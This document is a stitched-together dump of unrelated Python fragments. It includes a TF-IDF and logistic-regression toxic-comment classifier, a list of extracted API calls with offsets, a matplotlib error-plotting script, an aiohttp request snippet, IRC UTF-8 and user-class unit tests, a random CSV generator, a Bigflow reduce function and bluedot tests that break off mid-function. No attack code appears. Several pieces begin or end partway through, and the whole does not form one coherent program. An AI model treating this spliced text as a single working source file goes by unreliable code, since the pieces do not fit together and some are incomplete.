text = re.sub(r"\'scuse", " excuse ", text)
# Replacing the HTMl characters with " "
text = re.sub("<.*?>", " ", text)
# Removing the punctuations
text = text.translate(str.maketrans(" ", " ", string.punctuation))
# Removing non-letters
text = re.sub("[^a-zA-Z]", " ", text)
# Replacing newline with space
text = re.sub("\n", " ", text)
# Split on space and rejoin to remove extra spaces
text = " ".join(text.split())
return text
def word_lemmatizer(text):
"""This function will help lemmatize words in a text.
"""
lemmatizer = WordNetLemmatizer()
# Tokenize the sentences to words
text = word_tokenize(text)
# Removing the stop words
text = [lemmatizer.lemmatize(word) for word in text]
# Joining the cleaned list
text = " ".join(text)
return text
# Cleaning and preprocessing the train data
train_df["comment_text"] = train_df["comment_text"].swifter.apply(clean_text)
train_df["comment_text"] = train_df["comment_text"].swifter.apply(word_lemmatizer)
# Cleaning and preprocessing the test data
new_test_df["comment_text"] = new_test_df["comment_text"].swifter.apply(clean_text)
new_test_df["comment_text"] = new_test_df["comment_text"].swifter.apply(word_lemmatizer)
# Performing the train-val split to create training and validation datasets
train, validation = train_test_split(train_df, test_size=0.2, random_state=42)
# print(X_train.shape, X_val.shape, y_train.shape, y_val.shape)
print(train.shape, validation.shape)
# Seperating our input and target variable columns
X_train = train.comment_text
X_val = validation.comment_text
X_test = new_test_df.comment_text
# Storing our target labels list in a variable
labels = ['toxic', 'severe_toxic', 'obscene', 'threat', 'insult', 'identity_hate']
# Creating a unigram TFIDF vectorizer and transforming all our input features
word_tfidf = TfidfVectorizer(max_features=5000, ngram_range=(1, 1), sublinear_tf=True, strip_accents="unicode",
analyzer="word",token_pattern=r"\w{1,}", stop_words=stop_words)
word_tfidf.fit(train_df.comment_text)
train_word_tfidf = word_tfidf.transform(X_train)
val_word_tfidf = word_tfidf.transform(X_val)
test_word_tfidf = word_tfidf.transform(X_test)
# Creating a char n-gram (2, 6) TFIDF vectorizer and transforming all our input features
char_tfidf = TfidfVectorizer(max_features=30000, ngram_range=(2, 6), sublinear_tf=True, strip_accents="unicode",
analyzer="char", stop_words=stop_words)
char_tfidf.fit(train_df.comment_text)
train_char_tfidf = char_tfidf.transform(X_train)
val_char_tfidf = char_tfidf.transform(X_val)
test_char_tfidf = char_tfidf.transform(X_test)
# Concatenating both unigram and n-gram features for our training input
train_features = hstack([train_word_tfidf, train_char_tfidf])
val_features = hstack([val_word_tfidf, val_char_tfidf])
test_features = hstack([test_word_tfidf, test_char_tfidf])
# Saving the tfidf vectors for future use
joblib.dump(word_tfidf, "word_tfidf_vectorizer.pkl")
joblib.dump(char_tfidf, "char_tfidf_vectorizer.pkl")
# Creating a logistic regression Model and treating each target as a binary classification problem
lr_model = OneVsRestClassifier(LogisticRegression(solver="saga"))
val_results = {"Accuracy": {}, "F1 Score": {}}
test_results = {"Accuracy": {}, "F1 Score": {}}
for label in labels:
print(f"... Processing {label}")
# train the model using X & y
lr_model.fit(train_features, train[label])
# Predicting the validation data labels
val_prediction = lr_model.predict(val_features)
# Predicting the test data labels
test_prediction = lr_model.predict(test_features)
# Saving the model based on target label
joblib.dump(lr_model, f"logistic_regression_{label}.pkl")
# Checking and model's accuracy and f1-score
val_results["Accuracy"][f"{label}"] = accuracy_score(validation[label], val_prediction)
val_results["F1 Score"][f"{label}"] = f1_score(validation[label], val_prediction, average = "weighted")
test_results["Accuracy"][f"{label}"] = accuracy_score(new_test_df[label], test_prediction)
test_results["F1 Score"][f"{label}"] = f1_score(new_test_df[label], test_prediction, average = "weighted")
| [
"sklearn.metrics.accuracy_score",
"sklearn.metrics.f1_score",
"nltk.corpus.stopwords.words",
"pandas.read_csv",
"sklearn.model_selection.train_test_split",
"pandas.merge",
"nltk.stem.WordNetLemmatizer",
"nltk.tokenize.word_tokenize",
"sklearn.linear_model.LogisticRegression",
"sklearn.feature_extraction.text.TfidfVectorizer",
"scipy.sparse.hstack",
"re.sub",
"joblib.dump",
"warnings.filterwarnings"
] | [((603, 636), 'warnings.filterwarnings', 'warnings.filterwarnings', (['"""ignore"""'], {}), "('ignore')\n", (626, 636), False, 'import warnings\n'), ((682, 726), 'pandas.read_csv', 'pd.read_csv', (['"""../input/toxic-data/train.csv"""'], {}), "('../input/toxic-data/train.csv')\n", (693, 726), True, 'import pandas as pd\n'), ((766, 809), 'pandas.read_csv', 'pd.read_csv', (['"""../input/toxic-data/test.csv"""'], {}), "('../input/toxic-data/test.csv')\n", (777, 809), True, 'import pandas as pd\n'), ((824, 874), 'pandas.read_csv', 'pd.read_csv', (['"""../input/toxic-data/test_labels.csv"""'], {}), "('../input/toxic-data/test_labels.csv')\n", (835, 874), True, 'import pandas as pd\n'), ((942, 983), 'pandas.merge', 'pd.merge', (['test_data', 'test_labels'], {'on': '"""id"""'}), "(test_data, test_labels, on='id')\n", (950, 983), True, 'import pandas as pd\n'), ((3454, 3512), 'sklearn.model_selection.train_test_split', 'train_test_split', (['train_df'], {'test_size': '(0.2)', 'random_state': '(42)'}), '(train_df, test_size=0.2, random_state=42)\n', (3470, 3512), False, 'from sklearn.model_selection import train_test_split\n'), ((3984, 4155), 'sklearn.feature_extraction.text.TfidfVectorizer', 'TfidfVectorizer', ([], {'max_features': '(5000)', 'ngram_range': '(1, 1)', 'sublinear_tf': '(True)', 'strip_accents': '"""unicode"""', 'analyzer': '"""word"""', 'token_pattern': '"""\\\\w{1,}"""', 'stop_words': 'stop_words'}), "(max_features=5000, ngram_range=(1, 1), sublinear_tf=True,\n strip_accents='unicode', analyzer='word', token_pattern='\\\\w{1,}',\n stop_words=stop_words)\n", (3999, 4155), False, 'from sklearn.feature_extraction.text import TfidfVectorizer\n'), ((4461, 4604), 'sklearn.feature_extraction.text.TfidfVectorizer', 'TfidfVectorizer', ([], {'max_features': '(30000)', 'ngram_range': '(2, 6)', 'sublinear_tf': '(True)', 'strip_accents': '"""unicode"""', 'analyzer': '"""char"""', 'stop_words': 'stop_words'}), "(max_features=30000, ngram_range=(2, 6), sublinear_tf=True,\n strip_accents='unicode', analyzer='char', stop_words=stop_words)\n", (4476, 4604), False, 'from sklearn.feature_extraction.text import TfidfVectorizer\n'), ((4902, 4946), 'scipy.sparse.hstack', 'hstack', (['[train_word_tfidf, train_char_tfidf]'], {}), '([train_word_tfidf, train_char_tfidf])\n', (4908, 4946), False, 'from scipy.sparse import hstack\n'), ((4962, 5002), 'scipy.sparse.hstack', 'hstack', (['[val_word_tfidf, val_char_tfidf]'], {}), '([val_word_tfidf, val_char_tfidf])\n', (4968, 5002), False, 'from scipy.sparse import hstack\n'), ((5019, 5061), 'scipy.sparse.hstack', 'hstack', (['[test_word_tfidf, test_char_tfidf]'], {}), '([test_word_tfidf, test_char_tfidf])\n', (5025, 5061), False, 'from scipy.sparse import hstack\n'), ((5105, 5157), 'joblib.dump', 'joblib.dump', (['word_tfidf', '"""word_tfidf_vectorizer.pkl"""'], {}), "(word_tfidf, 'word_tfidf_vectorizer.pkl')\n", (5116, 5157), False, 'import joblib\n'), ((5158, 5210), 'joblib.dump', 'joblib.dump', (['char_tfidf', '"""char_tfidf_vectorizer.pkl"""'], {}), "(char_tfidf, 'char_tfidf_vectorizer.pkl')\n", (5169, 5210), False, 'import joblib\n'), ((149, 175), 'nltk.corpus.stopwords.words', 'stopwords.words', (['"""english"""'], {}), "('english')\n", (164, 175), False, 'from nltk.corpus import stopwords\n'), ((1709, 1743), 're.sub', 're.sub', (['"""what\'s"""', '"""what is """', 'text'], {}), '("what\'s", \'what is \', text)\n', (1715, 1743), False, 'import re, string\n'), ((1756, 1781), 're.sub', 're.sub', (['"""\\\\\'s"""', '""" """', 'text'], {}), '("\\\\\'s", \' \', text)\n', (1762, 1781), False, 'import re, string\n'), ((1793, 1824), 're.sub', 're.sub', (['"""\\\\\'ve"""', '""" have """', 'text'], {}), '("\\\\\'ve", \' have \', text)\n', (1799, 1824), False, 'import re, string\n'), ((1836, 1869), 're.sub', 're.sub', (['"""can\'t"""', '"""can not """', 'text'], {}), '("can\'t", \'can not \', text)\n', (1842, 1869), False, 'import re, string\n'), ((1882, 1910), 're.sub', 're.sub', (['"""n\'t"""', '""" not """', 'text'], {}), '("n\'t", \' not \', text)\n', (1888, 1910), False, 'import re, string\n'), ((1923, 1951), 're.sub', 're.sub', (['"""i\'m"""', '"""i am """', 'text'], {}), '("i\'m", \'i am \', text)\n', (1929, 1951), False, 'import re, string\n'), ((1964, 1994), 're.sub', 're.sub', (['"""\\\\\'re"""', '""" are """', 'text'], {}), '("\\\\\'re", \' are \', text)\n', (1970, 1994), False, 'import re, string\n'), ((2006, 2037), 're.sub', 're.sub', (['"""\\\\\'d"""', '""" would """', 'text'], {}), '("\\\\\'d", \' would \', text)\n', (2012, 2037), False, 'import re, string\n'), ((2049, 2080), 're.sub', 're.sub', (['"""\\\\\'ll"""', '""" will """', 'text'], {}), '("\\\\\'ll", \' will \', text)\n', (2055, 2080), False, 'import re, string\n'), ((2092, 2128), 're.sub', 're.sub', (['"""\\\\\'scuse"""', '""" excuse """', 'text'], {}), '("\\\\\'scuse", \' excuse \', text)\n', (2098, 2128), False, 'import re, string\n'), ((2185, 2211), 're.sub', 're.sub', (['"""<.*?>"""', '""" """', 'text'], {}), "('<.*?>', ' ', text)\n", (2191, 2211), False, 'import re, string\n'), ((2353, 2383), 're.sub', 're.sub', (['"""[^a-zA-Z]"""', '""" """', 'text'], {}), "('[^a-zA-Z]', ' ', text)\n", (2359, 2383), False, 'import re, string\n'), ((2430, 2453), 're.sub', 're.sub', (['"""\n"""', '""" """', 'text'], {}), "('\\n', ' ', text)\n", (2436, 2453), False, 'import re, string\n'), ((2680, 2699), 'nltk.stem.WordNetLemmatizer', 'WordNetLemmatizer', ([], {}), '()\n', (2697, 2699), False, 'from nltk.stem import WordNetLemmatizer\n'), ((2749, 2768), 'nltk.tokenize.word_tokenize', 'word_tokenize', (['text'], {}), '(text)\n', (2762, 2768), False, 'from nltk.tokenize import word_tokenize\n'), ((5342, 5375), 'sklearn.linear_model.LogisticRegression', 'LogisticRegression', ([], {'solver': '"""saga"""'}), "(solver='saga')\n", (5360, 5375), False, 'from sklearn.linear_model import LogisticRegression\n'), ((5849, 5906), 'joblib.dump', 'joblib.dump', (['lr_model', 'f"""logistic_regression_{label}.pkl"""'], {}), "(lr_model, f'logistic_regression_{label}.pkl')\n", (5860, 5906), False, 'import joblib\n'), ((5998, 6047), 'sklearn.metrics.accuracy_score', 'accuracy_score', (['validation[label]', 'val_prediction'], {}), '(validation[label], val_prediction)\n', (6012, 6047), False, 'from sklearn.metrics import accuracy_score, f1_score, roc_auc_score\n'), ((6090, 6153), 'sklearn.metrics.f1_score', 'f1_score', (['validation[label]', 'val_prediction'], {'average': '"""weighted"""'}), "(validation[label], val_prediction, average='weighted')\n", (6098, 6153), False, 'from sklearn.metrics import accuracy_score, f1_score, roc_auc_score\n'), ((6199, 6250), 'sklearn.metrics.accuracy_score', 'accuracy_score', (['new_test_df[label]', 'test_prediction'], {}), '(new_test_df[label], test_prediction)\n', (6213, 6250), False, 'from sklearn.metrics import accuracy_score, f1_score, roc_auc_score\n'), ((6294, 6359), 'sklearn.metrics.f1_score', 'f1_score', (['new_test_df[label]', 'test_prediction'], {'average': '"""weighted"""'}), "(new_test_df[label], test_prediction, average='weighted')\n", (6302, 6359), False, 'from sklearn.metrics import accuracy_score, f1_score, roc_auc_score\n')] |
# -*- coding: utf-8 -*-
import matplotlib.pyplot as plt
import numpy as np
import csv
import sys
sys.path.append("..\\..\\libraries")
from GraphicLibrary import drawPoint, drawCircle, initDrawing, finishDrawing
from GeometryLibrary import getPoint, angle_radians
filename = "out-dist-0,40m_B-complete.txt"
# Lade Daten
data = list()
with open(filename) as csvDataFile:
csvReader = csv.reader(csvDataFile, delimiter=';')
for row in csvReader:
data.append(row)
data = data[1:]
# Stelle Ergebnisse da
initDrawing(figsize=(16,8))
import matplotlib.cm as cm
from matplotlib.colors import Normalize
cmap = cm.Reds #cm.autumn
norm = Normalize(vmin=0, vmax=1)
error1 = list()
error2 = list()
for d in data:
error1.append(float(d[7]))
error2.append(float(d[11]))
errmax1 = np.max(error1)
errmax2 = np.max(error2)
plt.subplot(1,2,1)
plt.grid()
for d in data:
dist = float(d[0])
angl = float(d[1])
distError = float(d[7])
relError = distError/dist
point = getPoint(dist*np.sin(angle_radians(angl)),dist*np.cos(angle_radians(angl)))
plt.scatter(point[0], point[1], s=1000*distError/errmax1, c="Black")
#plt.colorbar()
plt.subplot(1,2,2)
plt.grid()
for d in data:
dist = float(d[0])
angl = float(d[1])
anglError = float(d[11])
point = getPoint(dist*np.sin(angle_radians(angl)),dist*np.cos(angle_radians(angl)))
plt.scatter(point[0], point[1], s=1000*anglError/errmax2, c="Black")
#plt.colorbar()
| [
"matplotlib.pyplot.grid",
"GeometryLibrary.angle_radians",
"numpy.max",
"GraphicLibrary.initDrawing",
"matplotlib.colors.Normalize",
"csv.reader",
"matplotlib.pyplot.scatter",
"sys.path.append",
"matplotlib.pyplot.subplot"
] | [((98, 134), 'sys.path.append', 'sys.path.append', (['"""..\\\\..\\\\libraries"""'], {}), "('..\\\\..\\\\libraries')\n", (113, 134), False, 'import sys\n'), ((526, 554), 'GraphicLibrary.initDrawing', 'initDrawing', ([], {'figsize': '(16, 8)'}), '(figsize=(16, 8))\n', (537, 554), False, 'from GraphicLibrary import drawPoint, drawCircle, initDrawing, finishDrawing\n'), ((655, 680), 'matplotlib.colors.Normalize', 'Normalize', ([], {'vmin': '(0)', 'vmax': '(1)'}), '(vmin=0, vmax=1)\n', (664, 680), False, 'from matplotlib.colors import Normalize\n'), ((802, 816), 'numpy.max', 'np.max', (['error1'], {}), '(error1)\n', (808, 816), True, 'import numpy as np\n'), ((827, 841), 'numpy.max', 'np.max', (['error2'], {}), '(error2)\n', (833, 841), True, 'import numpy as np\n'), ((843, 863), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(1)', '(2)', '(1)'], {}), '(1, 2, 1)\n', (854, 863), True, 'import matplotlib.pyplot as plt\n'), ((862, 872), 'matplotlib.pyplot.grid', 'plt.grid', ([], {}), '()\n', (870, 872), True, 'import matplotlib.pyplot as plt\n'), ((1170, 1190), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(1)', '(2)', '(2)'], {}), '(1, 2, 2)\n', (1181, 1190), True, 'import matplotlib.pyplot as plt\n'), ((1189, 1199), 'matplotlib.pyplot.grid', 'plt.grid', ([], {}), '()\n', (1197, 1199), True, 'import matplotlib.pyplot as plt\n'), ((392, 430), 'csv.reader', 'csv.reader', (['csvDataFile'], {'delimiter': '""";"""'}), "(csvDataFile, delimiter=';')\n", (402, 430), False, 'import csv\n'), ((1084, 1156), 'matplotlib.pyplot.scatter', 'plt.scatter', (['point[0]', 'point[1]'], {'s': '(1000 * distError / errmax1)', 'c': '"""Black"""'}), "(point[0], point[1], s=1000 * distError / errmax1, c='Black')\n", (1095, 1156), True, 'import matplotlib.pyplot as plt\n'), ((1382, 1454), 'matplotlib.pyplot.scatter', 'plt.scatter', (['point[0]', 'point[1]'], {'s': '(1000 * anglError / errmax2)', 'c': '"""Black"""'}), "(point[0], point[1], s=1000 * anglError / errmax2, c='Black')\n", (1393, 1454), True, 'import matplotlib.pyplot as plt\n'), ((1025, 1044), 'GeometryLibrary.angle_radians', 'angle_radians', (['angl'], {}), '(angl)\n', (1038, 1044), False, 'from GeometryLibrary import getPoint, angle_radians\n'), ((1058, 1077), 'GeometryLibrary.angle_radians', 'angle_radians', (['angl'], {}), '(angl)\n', (1071, 1077), False, 'from GeometryLibrary import getPoint, angle_radians\n'), ((1323, 1342), 'GeometryLibrary.angle_radians', 'angle_radians', (['angl'], {}), '(angl)\n', (1336, 1342), False, 'from GeometryLibrary import getPoint, angle_radians\n'), ((1356, 1375), 'GeometryLibrary.angle_radians', 'angle_radians', (['angl'], {}), '(angl)\n', (1369, 1375), False, 'from GeometryLibrary import getPoint, angle_radians\n')] |
#!/usr/bin/env python3
import json
import asyncio
import aiohttp
async def req():
resp = await aiohttp.ClientSession().request(
#"get", 'http://localhost:8088/api/v1/links/1',
"get", 'http://localhost:8088/api/v1/links/1',
#data=json.dumps({"domain": "http://google.com", "action": "Links"}),
headers={"content-type": "application/json"})
print(str(resp))
print(await resp.text())
assert 200 == resp.status
async def req2():
resp = await aiohttp.ClientSession().request(
"get", 'http://localhost:8088/api/v1/domains',
headers={"content-type": "application/json"})
print(str(resp))
print(await resp.text())
assert 200 == resp.status
asyncio.get_event_loop().run_until_complete(req())
asyncio.get_event_loop().run_until_complete(req2()) | [
"aiohttp.ClientSession",
"asyncio.get_event_loop"
] | [((717, 741), 'asyncio.get_event_loop', 'asyncio.get_event_loop', ([], {}), '()\n', (739, 741), False, 'import asyncio\n'), ((769, 793), 'asyncio.get_event_loop', 'asyncio.get_event_loop', ([], {}), '()\n', (791, 793), False, 'import asyncio\n'), ((101, 124), 'aiohttp.ClientSession', 'aiohttp.ClientSession', ([], {}), '()\n', (122, 124), False, 'import aiohttp\n'), ((493, 516), 'aiohttp.ClientSession', 'aiohttp.ClientSession', ([], {}), '()\n', (514, 516), False, 'import aiohttp\n')] |
"""
`Ergo <https://ergo.chat/>`_-specific tests of non-Unicode filtering
TODO: turn this into a test of `IRCv3 UTF8ONLY
<https://ircv3.net/specs/extensions/utf8-only>`_
"""
from irctest import cases
from irctest.patma import ANYSTR
class Utf8TestCase(cases.BaseServerTestCase):
@cases.mark_specifications("Ergo")
def testUtf8Validation(self):
self.connectClient(
"bar",
capabilities=["batch", "echo-message", "labeled-response"],
)
self.joinChannel(1, "#qux")
self.sendLine(1, "PRIVMSG #qux hi")
ms = self.getMessages(1)
self.assertMessageMatch(
[m for m in ms if m.command == "PRIVMSG"][0], params=["#qux", "hi"]
)
self.sendLine(1, b"PRIVMSG #qux hi\xaa")
self.assertMessageMatch(
self.getMessage(1),
command="FAIL",
params=["PRIVMSG", "INVALID_UTF8", ANYSTR],
tags={},
)
self.sendLine(1, b"@label=xyz PRIVMSG #qux hi\xaa")
self.assertMessageMatch(
self.getMessage(1),
command="FAIL",
params=["PRIVMSG", "INVALID_UTF8", ANYSTR],
tags={"label": "xyz"},
)
| [
"irctest.cases.mark_specifications"
] | [((287, 320), 'irctest.cases.mark_specifications', 'cases.mark_specifications', (['"""Ergo"""'], {}), "('Ergo')\n", (312, 320), False, 'from irctest import cases\n')] |
import unittest
from user import User
import pyperclip
class TestUser(unittest.TestCase):
"""
Test class that defines test cases for the user class behaviours.
Args:
unittest.TestCase: TestCase class that helps in creating test cases
"""
def tearDown(self):
"""
It resets the user_list array(cleans up)
"""
User.user_list = []
def setUp(self):
"""
It creates a test User
"""
self.new_user = User("Danlon", "Situma", "<PASSWORD>", "<PASSWORD>")
def test_init(self):
"""
Test case to test if the object id initialized properly
"""
self.assertEqual(self.new_user.first_name, "Danlon")
self.assertEqual(self.new_user.last_name, "Situma")
self.assertEqual(self.new_user.user_name, "Dasi202")
self.assertEqual(self.new_user.password, "<PASSWORD>")
def test_save_user(self):
"""
Test case to test if the user object is saved into the user list
"""
self.new_user.save_user()
self.assertEqual(len(User.user_list), 1)
def test_save_multiple_user(self):
"""
Test case to check if we can save multiple user objects to the user list
"""
self.new_user.save_user()
test_user = User("Test", "user", "test", "walIas15")
test_user.save_user()
self.assertEqual(len(User.user_list), 2)
def test_find_user_by_username(self):
"""
Test case to check if we can find a user by user name and display information
"""
self.new_user.save_user()
test_user = User("Test", "user", "test", "walIas15")
test_user.save_user()
user_exists = User.user_exist("test")
self.assertTrue(user_exists)
def test_check_user(self):
"""
Test case to check for the user
"""
self.new_user.save_user()
test_user = User("Test", "user", "test", "walIas15")
test_user.save_user()
test_user.check_user("test", "walIas15")
if __name__ == '__main__':
unittest.main() | [
"unittest.main",
"user.User.user_exist",
"user.User"
] | [((2100, 2115), 'unittest.main', 'unittest.main', ([], {}), '()\n', (2113, 2115), False, 'import unittest\n'), ((494, 546), 'user.User', 'User', (['"""Danlon"""', '"""Situma"""', '"""<PASSWORD>"""', '"""<PASSWORD>"""'], {}), "('Danlon', 'Situma', '<PASSWORD>', '<PASSWORD>')\n", (498, 546), False, 'from user import User\n'), ((1317, 1357), 'user.User', 'User', (['"""Test"""', '"""user"""', '"""test"""', '"""walIas15"""'], {}), "('Test', 'user', 'test', 'walIas15')\n", (1321, 1357), False, 'from user import User\n'), ((1644, 1684), 'user.User', 'User', (['"""Test"""', '"""user"""', '"""test"""', '"""walIas15"""'], {}), "('Test', 'user', 'test', 'walIas15')\n", (1648, 1684), False, 'from user import User\n'), ((1737, 1760), 'user.User.user_exist', 'User.user_exist', (['"""test"""'], {}), "('test')\n", (1752, 1760), False, 'from user import User\n'), ((1948, 1988), 'user.User', 'User', (['"""Test"""', '"""user"""', '"""test"""', '"""walIas15"""'], {}), "('Test', 'user', 'test', 'walIas15')\n", (1952, 1988), False, 'from user import User\n')] |
from django.db import models
from auditable.models import Auditable
class IcbcUploadDate(Auditable):
upload_date = models.DateField(
blank=False,
db_comment="the date the icbc data is current to",
null=False,
auto_now=False)
class Meta:
db_table = 'icbc_upload_date'
db_table_comment = "contains a record for each time that the icbc file is \
uploaded, with the date current to as specified by the user"
| [
"django.db.models.DateField"
] | [((121, 234), 'django.db.models.DateField', 'models.DateField', ([], {'blank': '(False)', 'db_comment': '"""the date the icbc data is current to"""', 'null': '(False)', 'auto_now': '(False)'}), "(blank=False, db_comment=\n 'the date the icbc data is current to', null=False, auto_now=False)\n", (137, 234), False, 'from django.db import models\n')] |
import csv
import random
# csvData = [['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K']]
# for x in range(5000):
# b = random.randint(0, 50)
# c = random.randint(0, 5)
# d = random.randint(-20, 20)
# elem = [x, b, c, d, 2*x, x+b, b+c, x+b+c, b*c*x*2, b*c, b > 20]
# for x in range(11):
# elem[x] = str(elem[x])
# csvData.append(elem)
# with open('example_1', 'w') as csvFile:
# writer = csv.writer(csvFile)
# writer.writerows(csvData)
# csvFile.close()
# csvData = [['A', 'B', 'C', 'D', 'E', 'F', 'G']]
# for x in range(5000):
# b = random.randint(0, 25)
# c = random.randint(0, 3)
# d = random.randint(-10, 20)
# elem = [x, b, c, d, c != 1, b+c, b+c+d]
# for x in range(7):
# elem[x] = str(elem[x])
# csvData.append(elem)
# with open('example_2', 'w') as csvFile:
# writer = csv.writer(csvFile)
# writer.writerows(csvData)
# csvFile.close()
# csvData = [['A', 'B', 'C', 'D', 'E', 'F', 'G']]
# for x in range(100000):
# b = random.randint(0, 25)
# c = random.randint(0, 3)
# d = random.randint(-10, 20)
# elem = [x, b, c, d, c != 1, b<10, c+d]
# for x in range(7):
# elem[x] = str(elem[x])
# csvData.append(elem)
# with open('example_3', 'w') as csvFile:
# writer = csv.writer(csvFile)
# writer.writerows(csvData)
# csvFile.close()
# csvData = [['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L']]
# for x in range(400000):
# b = random.randint(0, 25)
# c = random.randint(0, 3)
# d = random.randint(-10, 20)
# elem = [x, b, c, d, c != 1, b<10, c+d, b < 20, c != 1 and b < 20, d+b+c, b*d, b*c*d]
# for x in range(7):
# elem[x] = str(elem[x])
# csvData.append(elem)
# with open('example_4', 'w') as csvFile:
# writer = csv.writer(csvFile)
# writer.writerows(csvData)
# csvFile.close()
# csvData = [['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N']]
# for x in range(400000):
# b = random.randint(0, 25)
# c = random.randint(0, 3)
# d = random.randint(-10, 20)
# elem = [x, b, c, d, c != 1, b<10, c+d, b < 20, c != 1 and b < 20, d+b+c, b*d, b*c*d, b*c, c%2 == 0]
# for x in range(14):
# elem[x] = str(elem[x])
# csvData.append(elem)
# with open('example_5', 'w') as csvFile:
# writer = csv.writer(csvFile)
# writer.writerows(csvData)
# csvFile.close()
# csvData = [['A', 'B', 'C', 'D', 'E', 'F', 'G']]
# for x in range(400000):
# a = random.randint(0, 25)
# b = random.randint(0, 3)
# c = random.randint(-10, 20)
# d = a + b <= 5
# e = (a + c)%8
# f = random.randint(0, 200)
# g = f <= 80
# elem = [a, b, c, d, e, f, g]
# for x in range(7):
# elem[x] = str(elem[x])
# csvData.append(elem)
# with open('example_norm', 'w') as csvFile:
# writer = csv.writer(csvFile)
# writer.writerows(csvData)
# csvFile.close()
csvData = [['A', 'B', 'C', 'D', 'E', 'F']]
for x in range(400000):
a = random.randint(0, 25)
b = random.randint(0, 3)
c = random.randint(-10, 20)
d = a <= 15 and b >= 2
e = a + b
f = a + b + c >= 15
elem = [a, b, c, d, e, f]
for x in range(6):
elem[x] = str(elem[x])
csvData.append(elem)
with open('example_make_index', 'w') as csvFile:
writer = csv.writer(csvFile)
writer.writerows(csvData)
csvFile.close()
| [
"csv.writer",
"random.randint"
] | [((3005, 3026), 'random.randint', 'random.randint', (['(0)', '(25)'], {}), '(0, 25)\n', (3019, 3026), False, 'import random\n'), ((3035, 3055), 'random.randint', 'random.randint', (['(0)', '(3)'], {}), '(0, 3)\n', (3049, 3055), False, 'import random\n'), ((3064, 3087), 'random.randint', 'random.randint', (['(-10)', '(20)'], {}), '(-10, 20)\n', (3078, 3087), False, 'import random\n'), ((3325, 3344), 'csv.writer', 'csv.writer', (['csvFile'], {}), '(csvFile)\n', (3335, 3344), False, 'import csv\n')] |
#
# Copyright (c) 2015 Baidu, Inc. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Script Definition
"""
import math
from bigflow import pobject
from bigflow.core import entity
from bigflow.util import side_input_util
from bigflow.util import utils
def reduce(ptype, fn, *side_inputs, **kargs):
"""
inner fun
"""
if utils.is_infinite(ptype):
raise ValueError("reduce not supported infinite PType")
scale = kargs.get('scale', 0.1)
partial_scale = math.sqrt(scale)
size = kargs.get('output_size', None)
if size is None:
partial_size = None
else:
partial_size = ptype.node().size() * math.sqrt(size / ptype.node().size())
memory = kargs.get('memory_limit', -1)
cpu = kargs.get('cpu_limit', -1)
objector = kargs.get('serde', ptype.serde()) # use the same serde of the input
side_inputs = side_input_util.SideInputsUtil.get_dealt_side_inputs_tuple(side_inputs)
partial_helper = side_input_util.SideInputsUtil(ptype, side_inputs)
partial_node = partial_helper.process_with_side_inputs()\
.by(entity.ReduceProcessor(fn).set_side_inputs(*side_inputs))\
.as_type(objector)\
.set_debug_info("ReducePartial: " + repr(fn)) \
.set_effective_key_num(0) \
.input(-1).allow_partial_processing().done() \
.set_size(partial_size, partial_scale) \
.set_memory(memory) \
.set_cpu(cpu)
non_partial_helper = side_input_util.SideInputsUtil(partial_node, side_inputs)
non_partial_node = non_partial_helper.process_with_side_inputs()\
.by(entity.ReduceProcessor(fn).set_side_inputs(*side_inputs))\
.as_type(objector)\
.set_debug_info("Reduce: " + repr(fn)) \
.set_effective_key_num(0) \
.set_size(size, partial_scale) \
.set_memory(memory) \
.set_cpu(cpu)
return pobject.PObject(non_partial_node, ptype.pipeline())
| [
"math.sqrt",
"bigflow.util.side_input_util.SideInputsUtil.get_dealt_side_inputs_tuple",
"bigflow.util.utils.is_infinite",
"bigflow.util.side_input_util.SideInputsUtil",
"bigflow.core.entity.ReduceProcessor"
] | [((860, 884), 'bigflow.util.utils.is_infinite', 'utils.is_infinite', (['ptype'], {}), '(ptype)\n', (877, 884), False, 'from bigflow.util import utils\n'), ((1007, 1023), 'math.sqrt', 'math.sqrt', (['scale'], {}), '(scale)\n', (1016, 1023), False, 'import math\n'), ((1390, 1461), 'bigflow.util.side_input_util.SideInputsUtil.get_dealt_side_inputs_tuple', 'side_input_util.SideInputsUtil.get_dealt_side_inputs_tuple', (['side_inputs'], {}), '(side_inputs)\n', (1448, 1461), False, 'from bigflow.util import side_input_util\n'), ((1483, 1533), 'bigflow.util.side_input_util.SideInputsUtil', 'side_input_util.SideInputsUtil', (['ptype', 'side_inputs'], {}), '(ptype, side_inputs)\n', (1513, 1533), False, 'from bigflow.util import side_input_util\n'), ((1970, 2027), 'bigflow.util.side_input_util.SideInputsUtil', 'side_input_util.SideInputsUtil', (['partial_node', 'side_inputs'], {}), '(partial_node, side_inputs)\n', (2000, 2027), False, 'from bigflow.util import side_input_util\n'), ((2111, 2137), 'bigflow.core.entity.ReduceProcessor', 'entity.ReduceProcessor', (['fn'], {}), '(fn)\n', (2133, 2137), False, 'from bigflow.core import entity\n'), ((1609, 1635), 'bigflow.core.entity.ReduceProcessor', 'entity.ReduceProcessor', (['fn'], {}), '(fn)\n', (1631, 1635), False, 'from bigflow.core import entity\n')] |
import pytest
from bluedot import MockBlueDot, BlueDotSwipe, BlueDotRotation
from bluedot.exceptions import ButtonDoesNotExist
from time import sleep
from threading import Event, Thread
def test_default_values():
mbd = MockBlueDot()
assert mbd.device == "hci0"
assert mbd.port == 1
assert mbd.running
assert mbd.cols == 1
assert mbd.rows == 1
assert mbd.print_messages
assert mbd.double_press_time == 0.3
assert mbd.rotation_segments == 8
assert mbd.when_client_connects == None
assert mbd.when_client_disconnects == None
assert mbd.when_pressed == None
assert mbd.when_double_pressed == None
assert mbd.when_moved == None
assert mbd.when_released == None
assert mbd.when_swiped == None
assert len(mbd.buttons) == 1
def test_modify_values():
mbd = MockBlueDot(device = "hci1", port = 2, auto_start_server = False, print_messages = False, cols = 3, rows = 2)
assert mbd.device == "hci1"
assert mbd.port == 2
assert not mbd.running
assert mbd.cols == 3
assert mbd.rows == 2
